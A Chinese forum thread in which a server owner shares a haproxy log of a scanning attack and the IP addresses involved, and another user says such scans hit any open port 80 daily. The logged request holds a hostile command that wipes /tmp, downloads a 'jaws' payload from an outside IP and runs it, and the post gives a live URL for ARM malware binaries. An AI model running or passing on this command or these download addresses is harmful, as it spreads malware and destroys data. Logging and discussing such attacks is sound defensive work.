有人扫我服务器发现了个恶意脚本地址

moe

3年前

本帖最后由 chinni 于 2022-4-1 14:20 编辑

这是他的请求

haproxy[395]: source=62.8.81.57:51286 backend-name=fe_hsts method= path= other="GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1"

复制代码

看了下 110.45.146.209/jaws 感觉全平台制霸了啊这个木马有大佬来玩么

这是恶意脚本.

http://110.45.146.209/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm

还有 mips 这种不得了啊

这种经常见，每次还换着不同的脚本地址来尝试。我这边只要开着80端口就天天被这种扫，fail2ban的名单列表长到快要显示不出来了

https://ipinfo.io/110.45.146.209
https://ipinfo.io/62.8.81.57